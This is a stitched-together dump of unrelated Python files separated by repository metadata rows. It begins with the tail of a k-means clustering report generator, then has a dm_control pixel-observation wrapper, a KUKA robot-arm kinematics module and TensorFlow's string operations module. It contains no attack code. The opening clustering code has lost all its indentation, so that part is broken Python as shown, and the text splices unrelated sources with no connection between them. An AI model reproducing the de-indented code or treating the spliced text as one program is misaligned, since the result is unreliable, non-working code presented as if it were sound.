dataset = ds.load_iris()
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(dataset["data"], k, seed=0)
centroids, cluster_assignment = kmeans(
dataset["data"],
k,
initial_centroids,
maxiter=400,
record_heterogeneity=heterogeneity,
verbose=True,
)
plot_heterogeneity(heterogeneity, k)
def ReportGenerator(
df: pd.DataFrame, ClusteringVariables: np.ndarray, FillMissingReport=None
) -> pd.DataFrame:
"""
Function generates easy-erading clustering report. It takes 2 arguments as an input:
DataFrame - dataframe with predicted cluester column;
FillMissingReport - dictionary of rules how we are going to fill missing
values of for final report generate (not included in modeling);
in order to run the function following libraries must be imported:
import pandas as pd
import numpy as np
>>> data = pd.DataFrame()
>>> data['numbers'] = [1, 2, 3]
>>> data['col1'] = [0.5, 2.5, 4.5]
>>> data['col2'] = [100, 200, 300]
>>> data['col3'] = [10, 20, 30]
>>> data['Cluster'] = [1, 1, 2]
>>> ReportGenerator(data, ['col1', 'col2'], 0)
Features Type Mark 1 2
0 # of Customers ClusterSize False 2.000000 1.000000
1 % of Customers ClusterProportion False 0.666667 0.333333
2 col1 mean_with_zeros True 1.500000 4.500000
3 col2 mean_with_zeros True 150.000000 300.000000
4 numbers mean_with_zeros False 1.500000 3.000000
.. ... ... ... ... ...
99 dummy 5% False 1.000000 1.000000
100 dummy 95% False 1.000000 1.000000
101 dummy stdev False 0.000000 NaN
102 dummy mode False 1.000000 1.000000
103 dummy median False 1.000000 1.000000
<BLANKLINE>
[104 rows x 5 columns]
"""
# Fill missing values with given rules
if FillMissingReport:
df.fillna(value=FillMissingReport, inplace=True)
df["dummy"] = 1
numeric_cols = df.select_dtypes(np.number).columns
report = (
df.groupby(["Cluster"])[ # construct report dataframe
numeric_cols
] # group by cluster number
.agg(
[
("sum", np.sum),
("mean_with_zeros", lambda x: np.mean(np.nan_to_num(x))),
("mean_without_zeros", lambda x: x.replace(0, np.NaN).mean()),
(
"mean_25-75",
lambda x: np.mean(
np.nan_to_num(
sorted(x)[
round(len(x) * 25 / 100) : round(len(x) * 75 / 100)
]
)
),
),
("mean_with_na", np.mean),
("min", lambda x: x.min()),
("5%", lambda x: x.quantile(0.05)),
("25%", lambda x: x.quantile(0.25)),
("50%", lambda x: x.quantile(0.50)),
("75%", lambda x: x.quantile(0.75)),
("95%", lambda x: x.quantile(0.95)),
("max", lambda x: x.max()),
("count", lambda x: x.count()),
("stdev", lambda x: x.std()),
("mode", lambda x: x.mode()[0]),
("median", lambda x: x.median()),
("# > 0", lambda x: (x > 0).sum()),
]
)
.T.reset_index()
.rename(index=str, columns={"level_0": "Features", "level_1": "Type"})
) # rename columns
# calculate the size of cluster(count of clientID's)
clustersize = report[
(report["Features"] == "dummy") & (report["Type"] == "count")
].copy() # avoid SettingWithCopyWarning
clustersize.Type = (
"ClusterSize" # rename created cluster df to match report column names
)
clustersize.Features = "# of Customers"
clusterproportion = pd.DataFrame(
clustersize.iloc[:, 2:].values
/ clustersize.iloc[:, 2:].values.sum() # calculating the proportion of cluster
)
clusterproportion[
"Type"
] = "% of Customers" # rename created cluster df to match report column names
clusterproportion["Features"] = "ClusterProportion"
cols = clusterproportion.columns.tolist()
cols = cols[-2:] + cols[:-2]
clusterproportion = clusterproportion[cols] # rearrange columns to match report
clusterproportion.columns = report.columns
a = pd.DataFrame(
abs(
report[report["Type"] == "count"].iloc[:, 2:].values
- clustersize.iloc[:, 2:].values
)
) # generating df with count of nan values
a["Features"] = 0
a["Type"] = "# of nan"
a.Features = report[
report["Type"] == "count"
].Features.tolist() # filling values in order to match report
cols = a.columns.tolist()
cols = cols[-2:] + cols[:-2]
a = a[cols] # rearrange columns to match report
a.columns = report.columns # rename columns to match report
report = report.drop(
report[report.Type == "count"].index
) # drop count values except cluster size
report = pd.concat(
[report, a, clustersize, clusterproportion], axis=0
) # concat report with clustert size and nan values
report["Mark"] = report["Features"].isin(ClusteringVariables)
cols = report.columns.tolist()
cols = cols[0:2] + cols[-1:] + cols[2:-1]
report = report[cols]
sorter1 = {
"ClusterSize": 9,
"ClusterProportion": 8,
"mean_with_zeros": 7,
"mean_with_na": 6,
"max": 5,
"50%": 4,
"min": 3,
"25%": 2,
"75%": 1,
"# of nan": 0,
"# > 0": -1,
"sum_with_na": -2,
}
report = (
report.assign(
Sorter1=lambda x: x.Type.map(sorter1),
Sorter2=lambda x: list(reversed(range(len(x)))),
)
.sort_values(["Sorter1", "Mark", "Sorter2"], ascending=False)
.drop(["Sorter1", "Sorter2"], axis=1)
)
report.columns.name = ""
report = report.reset_index()
report.drop(columns=["index"], inplace=True)
return report
if __name__ == "__main__":
import doctest
doctest.testmod()
| 37.463277 | 89 | 0.57661 |
da66865ef4504b413d256162bc5ab22b217c46d1 | 4,451 | py | Python | dm_control/suite/wrappers/pixels.py | hzm2016/dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 2 | 2019-02-14T23:41:45.000Z | 2022-02-10T04:08:44.000Z | dm_control/suite/wrappers/pixels.py | jiajunhua/deepmind-dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 1 | 2019-03-02T13:37:17.000Z | 2019-03-02T13:37:17.000Z | dm_control/suite/wrappers/pixels.py | svikramank/dm_control | c24ec9f5f3cb3c25c6571c89c9f60bf3350f5711 | [
"Apache-2.0"
] | 1 | 2018-11-20T04:39:05.000Z | 2018-11-20T04:39:05.000Z | # Copyright 2017 The dm_control Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Wrapper that adds pixel observations to a control environment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Internal dependencies.
from dm_control.rl import environment
from dm_control.rl import specs
STATE_KEY = 'state'
class Wrapper(environment.Base):
"""Wraps a control environment and adds a rendered pixel observation."""
def __init__(self, env, pixels_only=True, render_kwargs=None,
observation_key='pixels'):
"""Initializes a new pixel Wrapper.
Args:
env: The environment to wrap.
pixels_only: If True (default), the original set of 'state' observations
returned by the wrapped environment will be discarded, and the
`OrderedDict` of observations will only contain pixels. If False, the
`OrderedDict` will contain the original observations as well as the
pixel observations.
render_kwargs: Optional `dict` containing keyword arguments passed to the
`mujoco.Physics.render` method.
observation_key: Optional custom string specifying the pixel observation's
key in the `OrderedDict` of observations. Defaults to 'pixels'.
Raises:
ValueError: If `env`'s observation spec is not compatible with the
wrapper. Supported formats are a single array, or a dict of arrays.
ValueError: If `env`'s observation already contains the specified
`observation_key`.
"""
if render_kwargs is None:
render_kwargs = {}
wrapped_observation_spec = env.observation_spec()
if isinstance(wrapped_observation_spec, specs.ArraySpec):
self._observation_is_dict = False
invalid_keys = set([STATE_KEY])
elif isinstance(wrapped_observation_spec, collections.MutableMapping):
self._observation_is_dict = True
invalid_keys = set(wrapped_observation_spec.keys())
else:
raise ValueError('Unsupported observation spec structure.')
if not pixels_only and observation_key in invalid_keys:
raise ValueError('Duplicate or reserved observation key {!r}.'
.format(observation_key))
if pixels_only:
self._observation_spec = collections.OrderedDict()
elif self._observation_is_dict:
self._observation_spec = wrapped_observation_spec.copy()
else:
self._observation_spec = collections.OrderedDict()
self._observation_spec[STATE_KEY] = wrapped_observation_spec
# Extend observation spec.
pixels = env.physics.render(**render_kwargs)
pixels_spec = specs.ArraySpec(
shape=pixels.shape, dtype=pixels.dtype, name=observation_key)
self._observation_spec[observation_key] = pixels_spec
self._env = env
self._pixels_only = pixels_only
self._render_kwargs = render_kwargs
self._observation_key = observation_key
def reset(self):
time_step = self._env.reset()
return self._add_pixel_observation(time_step)
def step(self, action):
time_step = self._env.step(action)
return self._add_pixel_observation(time_step)
def observation_spec(self):
return self._observation_spec
def action_spec(self):
return self._env.action_spec()
def _add_pixel_observation(self, time_step):
if self._pixels_only:
observation = collections.OrderedDict()
elif self._observation_is_dict:
observation = type(time_step.observation)(time_step.observation)
else:
observation = collections.OrderedDict()
observation[STATE_KEY] = time_step.observation
pixels = self._env.physics.render(**self._render_kwargs)
observation[self._observation_key] = pixels
return time_step._replace(observation=observation)
def __getattr__(self, name):
return getattr(self._env, name)
| 36.186992 | 80 | 0.722759 |
fefd085238abf72e3dddfcd2ba0f9969aea664cc | 7,104 | py | Python | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | kuka_arm/scripts/kinematics/kinematics.py | TheoKanning/RoboND-Kinematics-Project | f7c8d622b21db68174f4bb251ca3757a74d15db6 | [
"MIT"
] | null | null | null | import numpy as np
from sympy import symbols, cos, sin, pi, simplify, Transpose
from math import atan2, sqrt, acos
from sympy.matrices import Matrix
# Symbols
q1, q2, q3, q4, q5, q6, q7 = symbols('q1:8')
d1, d2, d3, d4, d5, d6, d7 = symbols('d1:8')
a0, a1, a2, a3, a4, a5, a6 = symbols('a0:7')
alpha0, alpha1, alpha2, alpha3, alpha4, alpha5, alpha6 = symbols('alpha0:7')
# DH Parameters
s = {alpha0: 0, a0: 0, d1: 0.75,
alpha1: -pi/2, a1: 0.35, d2: 0, q2: q2-pi/2,
alpha2: 0, a2: 1.25, d3: 0,
alpha3: -pi/2, a3: -0.054, d4: 1.50,
alpha4: pi/2, a4: 0, d5: 0,
alpha5: -pi/2, a5: 0, d6: 0,
alpha6: 0, a6: 0, d7: 0.303, q7: 0}
q = symbols('q')
a = symbols('a')
alpha = symbols('alpha')
d = symbols('d')
BASE_T = Matrix([[cos(q), -sin(q), 0, a],
[sin(q) * cos(alpha), cos(q) * cos(alpha), -sin(alpha), -sin(alpha) * d],
[sin(q) * sin(alpha), cos(q) * sin(alpha), cos(alpha), cos(alpha) * d],
[0, 0, 0, 1]])
# Substitute DH parameters into base matrix to create joint transforms
T0_1 = BASE_T.subs({alpha: alpha0, a: a0, d: d1, q: q1}).subs(s)
T1_2 = BASE_T.subs({alpha: alpha1, a: a1, d: d2, q: q2}).subs(s)
T2_3 = BASE_T.subs({alpha: alpha2, a: a2, d: d3, q: q3}).subs(s)
T3_4 = BASE_T.subs({alpha: alpha3, a: a3, d: d4, q: q4}).subs(s)
T4_5 = BASE_T.subs({alpha: alpha4, a: a4, d: d5, q: q5}).subs(s)
T5_6 = BASE_T.subs({alpha: alpha5, a: a5, d: d6, q: q6}).subs(s)
T6_G = BASE_T.subs({alpha: alpha6, a: a6, d: d7, q: q7}).subs(s)
def print_matrix(matrix):
# print in markdown table format
print("col 1 | col 2 | col 3 | col 4")
print("---|---|---|---")
for row in range(matrix.shape[0]):
output = ""
for col in range(matrix.shape[1]):
output += str(matrix[row, col])
if col != matrix.shape[1] - 1:
output += " | "
print(output)
print_matrix((T3_4 * T4_5 * T5_6))
# Gripper link orientation correction
R_z = Matrix([[cos(np.pi), -sin(np.pi), 0, 0],
[sin(np.pi), cos(np.pi), 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 1]])
R_y = Matrix([[cos(-np.pi/2), 0, sin(-np.pi/2), 0],
[0, 1, 0, 0],
[-sin(-np.pi/2), 0, cos(-np.pi/2), 0],
[0, 0, 0, 1]])
R_corr = R_z * R_y
def get_forward(angles):
"""
Calculates EE position and orientation given joint angles
returns ([x, y, z], [x, y, z, w])
"""
transform = T0_1.evalf(subs={q1: angles[0]})
transform *= T1_2.evalf(subs={q2: angles[1]})
transform *= T2_3.evalf(subs={q3: angles[2]})
transform *= T3_4.evalf(subs={q4: angles[3]})
transform *= T4_5.evalf(subs={q5: angles[4]})
transform *= T5_6.evalf(subs={q6: angles[5]})
transform *= T6_G
transform *= R_corr.evalf()
rotation = angles_from_transform(transform)
x = transform[0, 3]
y = transform[1, 3]
z = transform[2, 3]
return [x, y, z], rotation
def angles_from_transform(transform):
"""
Returns the euler angles corresponding to the given 3x3 rotation matrix
:param transform: 4x4 Matrix object
:return: (roll, pitch, yaw)
"""
matrix = transform.evalf()
r11 = matrix[0, 0]
r21 = matrix[1, 0]
r31 = matrix[2, 0]
r32 = matrix[2, 1]
r33 = matrix[2, 2]
yaw = atan2(r21, r11)
pitch = atan2(-r31, sqrt(r11**2 + r21**2))
roll = atan2(r32, r33)
return roll, pitch, yaw
def wrist_angles_from_transform(transform):
"""
Returns the necessary wrist joint angles to create the required transformation
:param transform: Matrix object
:return: theta4, theta5, theta6
"""
matrix = transform.evalf()
r13 = matrix[0, 2]
r21 = matrix[1, 0]
r22 = matrix[1, 1]
r23 = matrix[1, 2]
r33 = matrix[2, 2]
# calculated by me
theta4 = atan2(r33, -r13)
theta5 = atan2(sqrt(r22 ** 2 + r21 ** 2), r23)
theta6 = atan2(-r22, r21)
return theta4, theta5, theta6
def create_rotation_matrix(angles):
"""
Returns a rotation matrix that will produce the given Euler angles
:param angles: (roll, pitch, yaw)
"""
R_x = Matrix([[1, 0, 0],
[0, cos(q), -sin(q)],
[0, sin(q), cos(q)]]).evalf(subs={q: angles[0]})
R_y = Matrix([[cos(q), 0, sin(q)],
[0, 1, 0],
[-sin(q), 0, cos(q)]]).evalf(subs={q: angles[1]})
R_z = Matrix([[cos(q), -sin(q), 0],
[sin(q), cos(q), 0],
[0, 0, 1]]).evalf(subs={q: angles[2]})
return R_z * R_y * R_x
def get_corrected_total_rotation(angles):
"""
Return the rotation matrix corresponding to the given gripper angles, taking into account the correction matrix
:param angles: [roll, pitch, yaw] in radians
:return: 3x3 Matrix
"""
return create_rotation_matrix(angles) * R_corr[:3, :3]
def get_wrist_center(ee_position, ee_orientation):
"""
Return the wrist center for a given ee position and orientation
"""
gripper_position = Matrix(ee_position)
r0_6 = get_corrected_total_rotation(ee_orientation)
# d7 is distance from joint 6 to gripper
displacement = r0_6 * Matrix([[0], [0], [d7]]).evalf(subs=s)
wc_position = gripper_position - displacement
return wc_position
def get_first_three_joints(wrist_pos):
"""
Calculate angles of the first three joints for the given wrist position
:param wrist_pos: (x, y, z)
:return: (joint1, joint2, joint3)
"""
# project onto xy plane
theta1 = atan2(wrist_pos[1], wrist_pos[0])
def law_of_cosines(a, b, c):
"""
Return angle given lengths of sides a, b, and c
"""
return acos((c ** 2 - a ** 2 - b ** 2) / (-2 * a * b))
link2 = s[a2]
link3 = sqrt(s[a3]**2 + s[d4]**2)
# wrist position projected onto plane of arm, minus joint 2 position
projected_wc = sqrt(wrist_pos[0]**2 + wrist_pos[1]**2) - s[a1], wrist_pos[2] - s[d1]
d2_wc = sqrt(projected_wc[0]**2 + projected_wc[1]**2)
# theta 2 is equal to the triangle angle plus the angle of the wc
theta2 = law_of_cosines(link2, d2_wc, link3) + atan2(projected_wc[1], projected_wc[0])
theta2 = -theta2 + np.pi / 2 # correct for join 2 orientation
# add correction because link is not straight
theta3 = - law_of_cosines(link2, link3, d2_wc) + np.pi/2 + atan2(s[a3], s[d4])
return theta1, theta2, theta3
def get_inverse(position, orientation):
"""
Given the desired position and orientation of the end effector, calculate the required joint angles
:param position:
:param orientation:
:return:
"""
wc = get_wrist_center(position, orientation)
theta1, theta2, theta3 = get_first_three_joints(wc)
r0_3 = (T0_1 * T1_2 * T2_3).evalf(subs={q1: theta1, q2: theta2, q3: theta3})[:3, :3]
r0_6 = get_corrected_total_rotation(orientation)
r3_6 = Transpose(r0_3) * r0_6
theta4, theta5, theta6 = wrist_angles_from_transform(r3_6)
return theta1, theta2, theta3, theta4, theta5, theta6
| 31.856502 | 115 | 0.586149 |
113795df6298a28b96a9970379646d5627f1ba5e | 21,823 | py | Python | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 57 | 2017-09-03T07:08:31.000Z | 2022-02-28T04:33:42.000Z | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 58 | 2021-11-22T05:41:28.000Z | 2022-01-19T01:33:40.000Z | tensorflow/python/ops/string_ops.py | joshz123/tensorflow | 7841ca029060ab78e221e757d4b1ee6e3e0ffaa4 | [
"Apache-2.0"
] | 66 | 2020-05-15T10:05:12.000Z | 2022-02-14T07:28:18.000Z | # -*- coding: utf-8 -*-
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for working with string Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_parsing_ops
from tensorflow.python.ops import gen_string_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
# pylint: disable=g-bad-import-order
from tensorflow.python.ops.gen_string_ops import *
from tensorflow.python.util import compat as util_compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=g-bad-import-order
# pylint: enable=wildcard-import
# pylint: disable=redefined-builtin
@tf_export("strings.regex_full_match")
@dispatch.add_dispatch_support
def regex_full_match(input, pattern, name=None):
r"""Match elements of `input` with regex `pattern`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
name: Name of the op.
Returns:
bool `Tensor` of the same shape as `input` with match results.
"""
if isinstance(pattern, util_compat.bytes_or_text_types):
# When `pattern` is static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_full_match(
input=input, pattern=pattern, name=name)
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
regex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__
@tf_export(
"strings.regex_replace", v1=["strings.regex_replace", "regex_replace"])
@deprecation.deprecated_endpoints("regex_replace")
@dispatch.add_dispatch_support
def regex_replace(input, pattern, rewrite, replace_global=True, name=None):
r"""Replace elements of `input` matching regex `pattern` with `rewrite`.
>>> tf.strings.regex_replace("Text with tags.<br /><b>contains html</b>",
... "<[^>]+>", " ")
<tf.Tensor: shape=(), dtype=string, numpy=b'Text with tags. contains html '>
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
rewrite: string or scalar string `Tensor`, value to use in match
replacement, supports backslash-escaped digits (\1 to \9) can be to insert
text matching corresponding parenthesized group.
replace_global: `bool`, if `True` replace all non-overlapping matches,
else replace only the first match.
name: A name for the operation (optional).
Returns:
string `Tensor` of the same shape as `input` with specified replacements.
"""
if (isinstance(pattern, util_compat.bytes_or_text_types) and
isinstance(rewrite, util_compat.bytes_or_text_types)):
# When `pattern` and `rewrite` are static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
return gen_string_ops.regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
@tf_export("strings.format")
def string_format(template, inputs, placeholder="{}", summarize=3, name=None):
r"""Formats a string template using a list of tensors.
Formats a string template using a list of tensors, abbreviating tensors by
only printing the first and last `summarize` elements of each dimension
(recursively). If formatting only one tensor into a template, the tensor does
not have to be wrapped in a list.
Example:
Formatting a single-tensor template:
```python
sess = tf.compat.v1.Session()
with sess.as_default():
tensor = tf.range(10)
formatted = tf.strings.format("tensor: {}, suffix", tensor)
out = sess.run(formatted)
expected = "tensor: [0 1 2 ... 7 8 9], suffix"
assert(out.decode() == expected)
```
Formatting a multi-tensor template:
```python
sess = tf.compat.v1.Session()
with sess.as_default():
tensor_one = tf.reshape(tf.range(100), [10, 10])
tensor_two = tf.range(10)
formatted = tf.strings.format("first: {}, second: {}, suffix",
(tensor_one, tensor_two))
out = sess.run(formatted)
expected = ("first: [[0 1 2 ... 7 8 9]\n"
" [10 11 12 ... 17 18 19]\n"
" [20 21 22 ... 27 28 29]\n"
" ...\n"
" [70 71 72 ... 77 78 79]\n"
" [80 81 82 ... 87 88 89]\n"
" [90 91 92 ... 97 98 99]], second: [0 1 2 ... 7 8 9], suffix")
assert(out.decode() == expected)
```
Args:
template: A string template to format tensor values into.
inputs: A list of `Tensor` objects, or a single Tensor.
The list of tensors to format into the template string. If a solitary
tensor is passed in, the input tensor will automatically be wrapped as a
list.
placeholder: An optional `string`. Defaults to `{}`.
At each placeholder occurring in the template, a subsequent tensor
will be inserted.
summarize: An optional `int`. Defaults to `3`.
When formatting the tensors, show the first and last `summarize`
entries of each tensor dimension (recursively). If set to -1, all
elements of the tensor will be shown.
name: A name for the operation (optional).
Returns:
A scalar `Tensor` of type `string`.
Raises:
ValueError: if the number of placeholders does not match the number of
inputs.
"""
# If there is only one tensor to format, we will automatically wrap it in a
# list to simplify the user experience
if tensor_util.is_tensor(inputs):
inputs = [inputs]
if template.count(placeholder) != len(inputs):
raise ValueError("%s placeholder(s) in template does not match %s tensor(s)"
" provided as input" % (template.count(placeholder),
len(inputs)))
return gen_string_ops.string_format(inputs,
template=template,
placeholder=placeholder,
summarize=summarize,
name=name)
# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which
# defines a wrapper for this function.
def string_split(source, sep=None, skip_empty=True, delimiter=None): # pylint: disable=invalid-name
"""Split elements of `source` based on `delimiter` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `delimiter` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
If `sep` is an empty string, each element of the `source` is split
into individual strings, each containing one byte. (This includes splitting
multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is
treated as a set of delimiters with each considered a potential split point.
For example:
N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output
will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character, the string should
be length 0 or 1. Default is ' '.
skip_empty: A `bool`. If `True`, skip the empty strings from the result.
delimiter: deprecated alias for `sep`.
Raises:
ValueError: If delimiter is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
delimiter = deprecation.deprecated_argument_lookup(
"sep", sep, "delimiter", delimiter)
if delimiter is None:
delimiter = " "
delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split(
source, delimiter=delimiter, skip_empty=skip_empty)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
# Note: tf.strings.split is exported in ragged/ragged_string_ops.py, which
# defines a wrapper for this function.
def string_split_v2(source, sep=None, maxsplit=-1):
"""Split elements of `source` based on `sep` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `sep` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',
then the output will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
If `sep` is given, consecutive delimiters are not grouped together and are
deemed to delimit empty strings. For example, source of `"1<>2<><>3"` and
sep of `"<>"` returns `["1", "2", "", "3"]`. If `sep` is None or an empty
string, consecutive whitespace are regarded as a single separator, and the
result will contain no empty strings at the start or end if the string has
leading or trailing whitespace.
Note that the above mentioned behavior matches python's str.split.
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character.
maxsplit: An `int`. If `maxsplit > 0`, limit of the split of the result.
Raises:
ValueError: If sep is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
if sep is None:
sep = ""
sep = ops.convert_to_tensor(sep, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split_v2(
source, sep=sep, maxsplit=maxsplit)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
def _reduce_join_reduction_dims(x, axis):
"""Returns range(rank(x) - 1, 0, -1) if axis is None; or axis otherwise."""
if axis is not None:
return axis
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if x.get_shape().ndims is not None:
return constant_op.constant(
np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return math_ops.range(array_ops.rank(x) - 1, -1, -1)
@tf_export(v1=["strings.reduce_join", "reduce_join"])
@deprecation.deprecated_args(None,
"keep_dims is deprecated, use keepdims instead",
"keep_dims")
@deprecation.deprecated_endpoints("reduce_join")
def reduce_join(inputs, axis=None, # pylint: disable=missing-docstring
keep_dims=None,
separator="",
name=None,
reduction_indices=None,
keepdims=None):
keepdims = deprecation.deprecated_argument_lookup("keepdims", keepdims,
"keep_dims", keep_dims)
if keep_dims is None:
keep_dims = False
axis = deprecation.deprecated_argument_lookup("axis", axis,
"reduction_indices",
reduction_indices)
return reduce_join_v2(
inputs=inputs,
axis=axis,
keepdims=keepdims,
separator=separator,
name=name)
@tf_export("strings.reduce_join", v1=[])
@dispatch.add_dispatch_support
def reduce_join_v2( # pylint: disable=missing-docstring
inputs,
axis=None,
keepdims=False,
separator="",
name=None):
"""Joins all strings into a single string, or joins along an axis.
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']]).numpy()
b'abc123def456'
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']], axis=-1).numpy()
array([b'abc123', b'def456'], dtype=object)
>>> tf.strings.reduce_join([['abc','123'],
... ['def','456']],
... axis=-1,
... separator=" ").numpy()
array([b'abc 123', b'def 456'], dtype=object)
Args:
inputs: A `tf.string` tensor.
axis: Which axis to join along. The default behavior is to join all
elements, producing a scalar.
keepdims: If true, retains reduced dimensions with length 1.
separator: a string added between each string being joined.
name: A name for the operation (optional).
Returns:
A `tf.string` tensor.
"""
with ops.name_scope(None, "ReduceJoin", [inputs, axis]):
inputs_t = ops.convert_to_tensor(inputs)
axis = _reduce_join_reduction_dims(inputs_t, axis)
return gen_string_ops.reduce_join(
inputs=inputs_t,
reduction_indices=axis,
keep_dims=keepdims,
separator=separator,
name=name)
reduce_join.__doc__ = reduce_join_v2.__doc__
# This wrapper provides backwards compatibility for code that predates the
# unit argument and that passed 'name' as a positional argument.
@tf_export(v1=["strings.length"])
@dispatch.add_dispatch_support
def string_length(input, name=None, unit="BYTE"):
"""Computes the length of each string given in the input tensor.
>>> strings = tf.constant(['Hello','TensorFlow', '🙂'])
>>> tf.strings.length(strings).numpy() # default counts bytes
array([ 5, 10, 4], dtype=int32)
>>> tf.strings.length(strings, unit="UTF8_CHAR").numpy()
array([ 5, 10, 1], dtype=int32)
Args:
input: A `Tensor` of type `string`. The strings for which to compute the
length for each element.
name: A name for the operation (optional).
unit: An optional `string` from: `"BYTE", "UTF8_CHAR"`. Defaults to
`"BYTE"`. The unit that is counted to compute string length. One of:
`"BYTE"` (for the number of bytes in each string) or `"UTF8_CHAR"` (for
the number of UTF-8 encoded Unicode code points in each string). Results
are undefined if `unit=UTF8_CHAR` and the `input` strings do not contain
structurally valid UTF-8.
Returns:
A `Tensor` of type `int32`, containing the length of the input string in
the same element of the input tensor.
"""
return gen_string_ops.string_length(input, unit=unit, name=name)
@tf_export("strings.length", v1=[])
@dispatch.add_dispatch_support
def string_length_v2(input, unit="BYTE", name=None):
return gen_string_ops.string_length(input, unit=unit, name=name)
string_length_v2.__doc__ = gen_string_ops.string_length.__doc__
@tf_export(v1=["substr"])
@deprecation.deprecated(None, "Use `tf.strings.substr` instead of `tf.substr`.")
def substr_deprecated(input, pos, len, name=None, unit="BYTE"):
return substr(input, pos, len, name=name, unit=unit)
substr_deprecated.__doc__ = gen_string_ops.substr.__doc__
@tf_export(v1=["strings.substr"])
@dispatch.add_dispatch_support
def substr(input, pos, len, name=None, unit="BYTE"):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr.__doc__ = gen_string_ops.substr.__doc__
@tf_export("strings.substr", v1=[])
@dispatch.add_dispatch_support
def substr_v2(input, pos, len, unit="BYTE", name=None):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr_v2.__doc__ = gen_string_ops.substr.__doc__
ops.NotDifferentiable("RegexReplace")
ops.NotDifferentiable("StringToHashBucket")
ops.NotDifferentiable("StringToHashBucketFast")
ops.NotDifferentiable("StringToHashBucketStrong")
